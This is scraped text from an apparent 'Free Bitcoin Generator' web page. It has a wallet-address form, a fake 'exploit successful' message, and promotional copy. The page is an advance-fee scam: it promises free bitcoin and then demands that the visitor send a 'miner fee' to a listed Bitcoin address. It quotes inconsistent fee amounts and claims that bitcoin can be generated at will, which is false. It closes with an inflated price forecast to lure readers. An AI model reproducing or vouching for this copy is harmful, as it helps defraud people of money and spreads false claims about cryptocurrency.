Enter your Bitcoin wallet address:

Choose amount of Bitcoin to generate:

0.1 BTC

*Choosing a larger amount will make the exploit take longer to run.

You must input a valid Bitcoin address above.


Congratulations! The exploit was successful and the coins will be sent to you shortly.

Your BTC will be sent to your address.

The Bitcoin network requires that each transaction have a small fee paid to the miners who create new blocks. In order for us to send your funds to you, you must send a small payment to the address listed below. After it has been received, your funds will be transferred and should arrive within 10 minutes.

Please send 0.003 BTC to bc1q34cgw4twlx8kp86e5509hek486gs7yr5spw5pe

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Free Bitcoin Generator

Free Bitcoin Generator is the most innovative and fastest Bitcoin Generator online. It was designed and offered for free use for all of the Bitcoin enthusiasts that want to get free Bitcoin without paying or investing anything. All you will have to do is to enter your personal Bitcoin Wallet Address in the field above and select the amount of Bitcoin that you want to receive in your wallet. In just a few moments you will receive your Free Bitcoins in your Bitcoin Wallet Address.

Earn Free Bitcoin Instantly

Earn Free Bitcoin instantly in a few minutes by following these simple steps. First of all you will have to enter your Bitcoin Wallet Address Id. It is recommended to use a secure wallet such the one Blockchain offers and make sure to copy it correctly from your Blockchain account. For every new transaction, make sure to generate a new wallet address. After this step you will be required to select the amount of Bitcoin that you want to receive. You may choose between 0.1 BTC and 2.5 BTC. After you have choosen the amount of Bitcoin you want to generate, click on the "GENERATE BITCOIN" green button. The whole process will take a few minutes and after the Bitcoin is generated, you will receive an message on the screen. In order to receive your free Bitcoins you will be required to transfer a small fee of only 0.00864 BTC to the Bitcoin miners that helped you. The Bitcoin Address where you will send your fee will be shown on the screen with a QR Code below. For each transaction there will be generated a new Bitcoin Address. After this step, you will receive your free Bitcoin on your personal Bitcoin Wallet through Blockchain.

How to create a Bitcoin Wallet Address

At the moment the most popular wallet is the one from Blockchain. It is the most secure site for cryptocurrencies transactions and it offers also free wallet addresses for Bitcoin, Ethereum and other cryptocurrencies. It's recommended to use a Blockchain wallet for any transaction that you make and afterwards it is strongly recommended to store your crypto assets on a hardware wallet. Blockchain offers instantly for each wallet address you generate, a QR code that can be used to facilitate the process of transactioning and eliminate the possibility to copy incorrectly an address.

Bitcoin Price Forecast 2023 - 140,000 USD

Bitcoin is the most known cryptocurrency worldwide. It was created by Satoshi Nakamoto 14 years ago. Since then this crypto asset has amazed the whole world with its major price changes. In 2017 the Bitcoin price exploded. If in the January 2016, the Bitcoin had a value of 400 usd, in December 2017 the price skyrocketed reaching a level of 20,000 usd. In 2018 Bitcoin price continued to decrease reaching its lowest level at the end of the year. In January 2019 Bitcoin price is around 3,600 - 4,000 USD and today at over 19,000 USD. In 2023 all the financial specialist and traders predicts a major price increased for Bitcoin and many assure Bitcoin owners that the Bitcoin value will be close to 140,000 USD! So take this opportunity to get free Bitcoin!

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